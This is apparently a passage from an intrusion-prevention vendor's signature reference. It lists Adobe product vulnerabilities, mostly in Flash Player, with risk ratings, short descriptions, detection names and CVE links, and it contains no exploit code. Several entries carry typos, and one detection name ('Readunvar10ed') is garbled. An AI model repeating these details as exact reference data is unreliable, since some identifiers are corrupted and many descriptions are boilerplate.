Improper sanitization of user data causes a cross-site scripting vulnerability in Adobe Products. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CS-Adobe-Commerce-And-Magento-Open-Source-Shipping-Policy-Cross-Site-Scripting

References:

CVE-2022-34258
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34258

Adobe-Commerce-And-Magento-Open-Source-Widget-XML-Injection

About this vulnerability:

A vulnerability in Adobe Commerce

Risk:

Moderate

First detected in:

sgpkg-ips-1523-5242

Last changed:

sgpkg-ips-1523-5242

Platform:

Generic

Software:

Adobe Commerce; Adobe Magento Open Source

Type:

Input Validation

Description:

Insufficient validation of user data used to build XML files when submitting widgets causes an XML injection vulnerability in Adobe Commerce and Magento Open Source. A successful exploit may allow an attacker to execute scripts on a user's browser or code on the server.

Situation:

HTTP_CRL-Adobe-Commerce-And-Magento-Open-Source-Widget-XML-Injection

References:

CVE-2022-34253
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34253

Adobe-Digital-Editions-Epub-Xxe-Information-Disclosure

About this vulnerability:

A vulnerability in Adobe Systems Digital Editions

Risk:

Moderate

First detected in:

sgpkg-ips-853-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Systems Digital Editions

Type:

Malfunction

Description:

Lack of validation of user-supplied data causes an information disclosure vulnerability in Adobe Systems Digital Editions. A successful exploit can allow an attacker to access files with the privileges of the target user.

Situation:

File-TextId_Adobe-Digital-Editions-Epub-Xxe-Information-Disclosure
File-Text_Adobe-Digital-Editions-Epub-Xxe-Information-Disclosure

References:

CVE-2016-7889
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7889

Adobe-DNG-Software-Development-Kit-Decodeimage-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Adobe Systems DNG Software Development Kit

Risk:

Moderate

First detected in:

sgpkg-ips-1254-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Systems DNG Software Development Kit

Type:

Malfunction

Description:

Improper parsing of JPEG data in DNG files in Adobe DNG Software Development Kit causes an out ouf bounds read vulnerability which can in some cases allow an attacker to execute code on the target system.

Situation:

File-Binary_Adobe-DNG-Software-Development-Kit-Decodeimage-Out-Of-Bounds-Read

References:

CVE-2020-9622
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9622

Adobe-DNG-Software-Development-Kit-Readuncompressed-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems DNG Software Development Kit

Risk:

Moderate

First detected in:

sgpkg-ips-1260-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Systems DNG Software Development Kit

Type:

Buffer Overflow

Description:

Improper parsing of data in DNG files in Adobe DNG Software Development Kit causes a hep buffer overflow vulnerability which can in some cases allow an attacker to execute code on the target system.

Situation:

File-Binary_Adobe-DNG-Software-Development-Kit-Readunvar10ed-Heap-Buffer-Overflow

References:

CVE-2020-9590
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9590

Adobe-Download-Manager-Getplus-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A vulnerability in Adobe Download Manager

Risk:

High

First detected in:

sgpkg-ips-279-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Acrobat; Adobe Reader

Type:

Buffer Overflow

Description:

There is a stack buffer overflow in Adobe Download Manager, a part of Adobe Acrobat and Adobe Acrobat Reader. Remote attackers can exploit this vulnerability by enticing affected users to open a malicious web page in a vulnerable version of the product. A successful exploitation leads to arbitrary code execution in the context of the current user.

Situation:

HTTP_SS-Adobe-Download-Manager-Getplus-ActiveX-Control-Buffer-Overflow
File-Text_Adobe-Download-Manager-Getplus-ActiveX-Control-Buffer-Overflow

References:

CVE-2009-3958
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3958

BID-37759
http://www.securityfocus.com/bid/37759

Adobe-Flash-Asnative-Null-Pointer-Dereference

About this vulnerability:	Adobe Flash Asnative Null Pointer Dereference vulnerability.
Risk:	High
First detected in:	sgpkg-ips-670-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Adobe Flash Player
Type:	Browser
Description:	A vulnerability exists in Adobe Flash Player browser plugin, versions 9 and 10, that allows remote attackers to cause a denial of service by using the Asnative method to call function 15-0 with a string as the first parameter, or function 301-1 with less than two parameters.
Situation:	File-Flash_Adobe-Flash-Asnative-Null-Pointer-Dereference

Adobe-Flash-Bitmapdata-copyPixels-UAF

About this vulnerability:

A vulnerability in Adobe Flash Player

Risk:

High

First detected in:

sgpkg-ips-1332-5242

Last changed:

sgpkg-ips-1332-5242

Platform:

Windows; OS X; Linux

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a vulberability in Adobe Flash Player, versions before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux, which allows remote attackers to execute arbitrary code via BitmapData.copyPixels.

Situation:

File-Flash_Adobe-Flash-Bitmapdata-copyPixels-UAF

References:

CVE-2016-4229
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4229

Adobe-Flash-Buffer-Overflow-Vulnerability-CVE-2013-0633

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

Moderate

First detected in:

sgpkg-ips-509-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Adobe Flash.

Situation:

File-Flash_Adobe-Flash-Buffer-Overflow-Vulnerability-CVE-2013-0633

References:

CVE-2013-0633
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0633

Adobe-Flash-Buffer-Overflow-Vulnerability-CVE-2013-0634

About this vulnerability:

A Buffer Overflow vulnerability exists in Adobe Flash.

Risk:

Moderate

First detected in:

sgpkg-ips-509-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Adobe Flash.

Situation:

File-Flash_Adobe-Flash-Buffer-Overflow-Vulnerability-CVE-2013-0634
File-Flash_Adobe-Flash-Buffer-Overflow-Vulnerability-CVE-2013-0638

References:

CVE-2013-0634
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0634

Adobe-Flash-Corrupted-SWF-File

About this vulnerability:	Adobe Flash Corrupted-SWF File vulnerability.
Risk:	High
First detected in:	sgpkg-ips-670-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Adobe Flash Player
Type:	Browser
Description:	A vulnerability exists in Adobe Flash Player browser plugin versions 10 that allows remote attackers to crash IE Explorer versions 6 through 8 by providing a corrupt .swf file.
Situation:	File-Flash_Adobe-Flash-Corrupted-SWF-File

Adobe-Flash-CVE-2010-3654-Remote-Code-Execution-Vulnerability

About this vulnerability:

A vulnerability in Adobe Systems Acrobat Reader and Flash

Risk:

High

First detected in:

sgpkg-ips-393-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player; Adobe Reader; Adobe Acrobat

Type:

Malfunction

Description:

A vulnerability exists in the Adobe Flash Player, Reader and Acrobat.

Situation:

HTTP_SS-Adobe-Flash-Exploit-CVE-2010-3643
File-Flash_Adobe-Flash-Exploit-CVE-2010-3643

References:

CVE-2010-3654
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3654

BID-44504
http://www.securityfocus.com/bid/44504

Adobe-Flash-Heap-Overflow-Vulnerability-CVE-2016-4135

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

Moderate

First detected in:

sgpkg-ips-772-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Flash.

Situation:

File-Flash_Adobe-Flash-Multiple-File-Loading-Vulnerabilities

References:

CVE-2016-4135
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4135

Adobe-Flash-Heap-Overflow-Vulnerability-CVE-2016-4136

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

Moderate

First detected in:

sgpkg-ips-772-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Flash.

Situation:

File-Flash_Adobe-Flash-Multiple-File-Loading-Vulnerabilities

References:

CVE-2016-4136
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4136

Adobe-Flash-Iexternalizable-Interface-Readexternal-Method-Type-Confusion

About this vulnerability:

A vulnerability in Adobe Systems Flash Player

Risk:

High

First detected in:

sgpkg-ips-716-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Malfunction

Description:

A type confusion vulnerability has been reported in Adobe Flash. The vulnerability is due to the readExternal method enforced by the iExternalizable interface being treated as a function by the AVM despite the identifier "readExternal" being overwritten. A remote attacker could exploit this vulnerability by enticing a user into opening a specially crafted SWF or web page. Successful exploitation could lead to arbitrary code execution under the security context of the user process.

Situation:

File-Flash_Adobe-Flash-Iexternalizable-Interface-Readexternal-Method-Type-Confusion

References:

CVE-2015-7647
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7647

Adobe-Flash-Iexternalizable-Interface-Type-Confusion

About this vulnerability:

A vulnerability in Adobe Systems Flash Player

Risk:

High

First detected in:

sgpkg-ips-700-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a type confusion vulnerability in Adobe Flash. A remote attacker can use this to execute arbitrary code on the affected machine.

Situation:

File-Flash_Adobe-Flash-Iexternalizable-Interface-Type-Confusion

References:

CVE-2015-7645
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7645

Adobe-Flash-Json.stringify-Proxy-Object-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems Flash Player

Risk:

High

First detected in:

sgpkg-ips-635-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Malfunction

Description:

A heap buffer overflow vulnerability has been reported in Adobe Flash. The vulnerability is due to a failure to check the number of objects in a buffer prior to conducting a copy operation when calling JSON.stringify on a Proxy object. A remote unauthenticated attacker could exploit this vulnerability by enticing a user into opening a specially crafted page that embeds a malicious SWF. Successful exploitation could lead to arbitrary code execution under the security context of the user process.

Situation:

File-Flash_Adobe-Flash-Json.stringify-Proxy-Object-Heap-Buffer-Overflow

References:

CVE-2015-0327
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0327

BID-72514
http://www.securityfocus.com/bid/72514

OSVDB-117977
http://www.osvdb.org/117977

Adobe-Flash-Loadpcmfrombytearray-Use-After-Free

About this vulnerability:

A vulnerability in Adobe Systems Adobe Flash Player Desktop Runtime

Risk:

High

First detected in:

sgpkg-ips-753-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a use-after-free vulnerability in Adobe Flash. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Flash_Adobe-Flash-Loadpcmfrombytearray-Use-After-Free

References:

CVE-2016-0984
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0984

Adobe-Flash-Media-Content

About this vulnerability:	Arbitary Adobe Flash media content transfer
Risk:	Low
First detected in:	sgpkg-ips-172-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Adobe Flash Player
Type:	Insecure Configuration
Description:	Adobe Flash Player is a multimedia player that uses various file formats to display interactive content.
Situation:	Shared_CS-Flash-Video-Upload Shared_SS-Flash-Video-Download E-Mail_BS-Adobe-Flash-Embedded-In-PDF-Download HTTP_SS-Adobe-Flash-Embedded-In-PDF-Download HTTP_SS-Adobe-Flash-Media-Download HTTP_SS-Adobe-Flash-Embedded-In-OLE-Document-Download File-OLE_Adobe-Flash-Embedded-In-OLE-Document File-Flash_Adobe-Flash-Media-Transfer File-PDF_Embedded-Adobe-Flash

Adobe-Flash-Memory-Corruption-CVE-2012-5267

About this vulnerability:

An attempt to exploit a vulnerability in Adobe Flash was detected

Risk:

Moderate

First detected in:

sgpkg-ips-493-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Adobe Flash was detected

Situation:

File-Flash_Adobe-Flash-Memory-Corruption-CVE-2012-5267

References:

CVE-2012-5267
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5267

OSVDB-86044
http://www.osvdb.org/86044

Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4132

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

Moderate

First detected in:

sgpkg-ips-772-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Flash.

Situation:

File-Flash_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4132

References:

CVE-2016-4132
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4132

Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4133

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

Moderate

First detected in:

sgpkg-ips-772-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Flash.

Situation:

File-Flash_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4133

References:

CVE-2016-4133
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4133

Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4137

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

Moderate

First detected in:

sgpkg-ips-772-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Flash.

Situation:

File-Flash_Adobe-Flash-Multiple-File-Loading-Vulnerabilities

References:

CVE-2016-4137
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4137

Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4138

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

Moderate

First detected in:

sgpkg-ips-772-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Flash.

Situation:

File-Flash_Adobe-Flash-Multiple-File-Loading-Vulnerabilities

References:

CVE-2016-4138
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4138

Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4141

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

Moderate

First detected in:

sgpkg-ips-772-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Flash.

Situation:

File-Binary_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4141

References:

CVE-2016-4141
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4141

Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4150

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

Moderate

First detected in:

sgpkg-ips-772-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Flash.

Situation:

File-Flash_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4150

References:

CVE-2016-4150
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4150

Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4151

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

Moderate

First detected in:

sgpkg-ips-772-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Flash.

Situation:

File-Flash_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4151

References:

CVE-2016-4151
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4151

Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4152

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

Moderate

First detected in:

sgpkg-ips-772-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Flash.

Situation:

File-Flash_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4152

References:

CVE-2016-4152
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4152

Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4153

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

Moderate

First detected in:

sgpkg-ips-772-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Flash.

Situation:

File-Flash_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4153

References:

CVE-2016-4153
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4153

Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4154

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

Moderate

First detected in:

sgpkg-ips-772-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Flash.

Situation:

File-Flash_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4154

References:

CVE-2016-4154
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4154

Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4155

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

Moderate

First detected in:

sgpkg-ips-772-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Flash.

Situation:

File-Flash_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4155

References:

CVE-2016-4155
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4155

Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4156

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

Moderate

First detected in:

sgpkg-ips-772-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Flash.

Situation:

File-Flash_Adobe-Flash-Memory-Corruption-Vulnerability-CVE-2016-4156

References:

CVE-2016-4156
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4156

Adobe-Flash-Mp3-Id3-Tag-Integer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems AIR desktop runtime

Risk:

High

First detected in:

sgpkg-ips-681-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Systems AIR; Adobe Flash Player

Type:

Integer Overflow

Description:

An integer overflow vulnerability has been reported in Adobe Flash. The vulnerability is due to an issue with parsing ID3 tag data. A remote attacker could exploit this vulnerability by enticing a user into opening a specially crafted SWF or web page. Successful exploitation could lead to arbitrary code execution under the security context of the user process.

Situation:

File-Binary_Adobe-Flash-Mp3-Id3-Tag-Integer-Overflow

References:

CVE-2015-5560
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5560

Adobe-Flash-parseFloat-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems Flash Player

Risk:

High

First detected in:

sgpkg-ips-622-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Buffer Overflow

Description:

A stack based buffer overflow has been reported in Adobe Flash. The vulnerability is due to insufficient checks on a buffer size prior to a copy operation. A remote unauthenticated attacker could exploit this vulnerability by enticing a user to open a page embedding a maliciously crafted SWF file. Successful exploitation could lead to arbitrary code execution under the security context of the running process.

Situation:

File-Flash_Adobe-Flash-parseFloat-Stack-Buffer-Overflow

References:

CVE-2014-9163
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9163

OSVDB-115560
http://www.osvdb.org/115560

Adobe-Flash-PCRE-Memory-Corruption

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

High

First detected in:

sgpkg-ips-639-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Input Validation

Description:

A memory corruption vulnerability has been reported in Adobe Flash. The vulnerability is due to an error while handling regular expressions. A remote attacker can exploit this vulnerability by enticing a user to process a maliciously crafted Flash file. This can lead to code execution in the context of the affected user.

Situation:

File-Flash_Adobe-Flash-PCRE-Memory-Corruption

References:

CVE-2015-0318
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0318

BID-72514
http://www.securityfocus.com/bid/72514

OSVDB-117972
http://www.osvdb.org/117972

Adobe-Flash-Player-And-Air-Domain-Global-Memory-Operation-Integer-Underflow

About this vulnerability:

A vulnerability in Adobe Flash Player

Risk:

High

First detected in:

sgpkg-ips-629-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Systems AIR; Adobe Systems AIR SDK; Adobe Flash Player

Type:

Malfunction

Description:

An integer underflow vulnerability has been reported in Adobe Flash Player and AIR. The vulnerability is due to an issue when parsing a flash file using domain-global memory operations. A remote attacker could exploit these vulnerabilities by enticing a target user to open a crafted file. A successful attack could result in the execution of arbitrary code in the security context of the target user.

Situation:

File-Flash_Adobe-Flash-Player-And-Air-Domain-Global-Memory-Operation-Integer-Underflow

References:

CVE-2014-0569
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0569

OSVDB-113199
http://www.osvdb.org/113199

Adobe-Flash-Player-And-Air-Multiple-Vulnerabilities

About this vulnerability:

A vulnerability in Adobe Flash Player and Adobe AIR

Risk:

High

First detected in:

sgpkg-ips-1106-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Systems AIR; Adobe Systems AIR SDK; Adobe Flash Player

Type:

Malfunction

Description:

Multiple vulnerabilities exist in Adobe Flash Player and AIR due to an issue in the way certain SWF content is displayed. A remote attacker could exploit these vulnerabilities by enticing a target user to open a crafted file. A successful attack could result in a denial of service or the execution of arbitrary code.

Situation:

File-Flash_Adobe-Flash-Player-And-Air-Multiple-Vulnerabilities

References:

CVE-2014-0558
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0558

Adobe-Flash-Player-And-Air-String-Concatenation-Integer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems AIR

Risk:

High

First detected in:

sgpkg-ips-610-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Systems AIR; Adobe Flash Player

Type:

Integer Overflow

Description:

An integer overflow vulnerability exists in Adobe Flash Player. The vulnerability is due to an error while concatenating large strings. A remote attacker could exploit this vulnerability by enticing a user to open a webpage with a crafted flash content. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.

Situation:

File-Flash_Adobe-Flash-Player-And-Air-String-Concatenation-Integer-Overflow

References:

CVE-2014-0550
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0550

OSVDB-111105
http://www.osvdb.org/111105

Adobe-Flash-Player-Asnative-2100-Netconnection-Type-Confusion

About this vulnerability:

A vulnerability in Adobe Systems Flash Player

Risk:

High

First detected in:

sgpkg-ips-637-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Malfunction

Description:

A type confusion vulnerability has been reported in Adobe Flash Player. The vulnerability is due to an issue when processing ASnative 2100 NetConnection calls where a failure to validate the object type occurs. A remote unauthenticated attacker could exploit this vulnerability by enticing a user into opening a specially crafted page. Successful exploitation could lead to arbitrary code execution under the security context of the user process.

Situation:

File-Flash_Adobe-Flash-Player-Asnative-2100-Netconnection-Type-Confusion

References:

CVE-2015-0336
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0336

BID-73084
http://www.securityfocus.com/bid/73084

OSVDB-119482
http://www.osvdb.org/119482

Adobe-Flash-Player-Audio-Buffer-Overflow-CVE-2015-3113

About this vulnerability:

Adobe Flash Player Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-1320-5242

Last changed:

sgpkg-ips-1320-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a heap buffer overflow vulnerability in Adobe Flash Player.

Situation:

File-Flash_Adobe-Flash-Player-Audio-Buffer-Overflow-CVE-2015-3113

References:

CVE-2015-3113
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3113

Adobe-Flash-Player-Bitmapdata-Hittest-Out-of-Bounds-Access

About this vulnerability:

A vulnerability in Adobe Systems Flash Player

Risk:

Moderate

First detected in:

sgpkg-ips-1044-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Integer Overflow

Description:

There has been reported an out-of-bounds access vulnerability in Adobe Flash Player. This vulnerability could be exploited by having a target user to open a maliciously crafted SWF file.

Situation:

File-Flash_Adobe-Flash-Player-Bitmapdata-Hittest-Out-of-Bounds-Access

References:

CVE-2017-11213
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11213

Adobe-Flash-Player-ByteArray-Uncompression-Uninitialized-Reference

About this vulnerability:

A vulnerability in Adobe Flash Player

Risk:

High

First detected in:

sgpkg-ips-627-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Systems AIR; Adobe Systems AIR SDK; Adobe Flash Player

Type:

Malfunction

Description:

An uninitialized reference vulnerability has been reported in Adobe Flash Player. The vulnerability is due to a failure to initialize an object pointer prior to its access when calling uncompress on a ByteArray. A remote attacker could exploit this vulnerability by enticing a target user to open a specially crafted file. A successful attack could result in the execution of arbitrary code in the security context of the target user.

Situation:

File-Flash_Adobe-Flash-Player-ByteArray-Uncompression-Uninitialized-Reference

References:

CVE-2014-8440
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8440

OSVDB-114489
http://www.osvdb.org/114489

Adobe-Flash-Player-ByteArray-Use-After-Free-RCS

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

High

First detected in:

sgpkg-ips-659-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Double Free

Description:

A use-after-free vulnerability exists in Adobe Flash Player. Linux, Windows and OS X browsers running vulnerable versions of Flash can be exploited for full code execution.

Situation:

File-Flash_Adobe-Flash-Player-ByteArray-Use-After-Free-RCS

References:

CVE-2015-5119
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5119

Adobe-Flash-Player-Convolutionfilter-Matrix-Array-Use-After-Free

About this vulnerability:

A vulnerability in Adobe Systems AIR desktop runtime

Risk:

High

First detected in:

sgpkg-ips-670-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Malfunction

Description:

A use-after-free vulnerability has been reported in Adobe Flash Player. The vulnerability is due to an issue with a dangling reference to the Matrix array object of a ConvolutionFilter when handling certain prototype calls. A remote attacker could exploit this vulnerability by enticing a user into opening a malicious SWF. Successful exploitation could lead to arbitrary code execution under the security context of the user process.

Situation:

File-Flash_Adobe-Flash-Player-Convolutionfilter-Matrix-Array-Use-After-Free

References:

CVE-2015-0349
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0349

Adobe-Flash-Player-Copypixelstobytearray-Integer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems AIR

Risk:

High

First detected in:

sgpkg-ips-610-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Systems AIR; Adobe Flash Player

Type:

Integer Overflow

Description:

A heap buffer overflow exists in Adobe Flash Player. The vulnerability is due to an integer overflow of the position property of a BitmapData object leading to a heap buffer overflow in copyPixelsToByteArray(). A remote attacker can exploit this vulnerability by enticing a target user to open a crafted file. A successful attack could result in the execution of arbitrary code in the security context of the target user.

Situation:

File-Flash_Adobe-Flash-Player-Copypixelstobytearray-Integer-Overflow

References:

CVE-2014-0556
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0556

BID-69696
http://www.securityfocus.com/bid/69696

OSVDB-111110
http://www.osvdb.org/111110

Adobe-Flash-Player-Copyrawdatato-Out-Of-Bounds-Array-Indexing

About this vulnerability:

A vulnerability in Adobe Systems Flash Player

Risk:

High

First detected in:

sgpkg-ips-657-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Malfunction

Description:

A memory corruption vulnerability has been reported in Adobe Flash Player. The vulnerability is due to an out of bounds array copy in the copyRawDataTo() method of Matrix3D class. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to download and process a maliciously crafted file. This can lead to code execution in the context of the affected application.

Situation:

File-Flash_Adobe-Flash-Player-Copyrawdatato-Out-Of-Bounds-Array-Indexing-2
File-Flash_Adobe-Flash-Player-Copyrawdatato-Out-Of-Bounds-Array-Indexing

References:

CVE-2012-5054
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5054

Adobe-Flash-Player-CVE-2014-8439-Write-What-Where

About this vulnerability:

A vulnerability in Adobe Systems Flash Player

Risk:

Moderate

First detected in:

sgpkg-ips-622-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

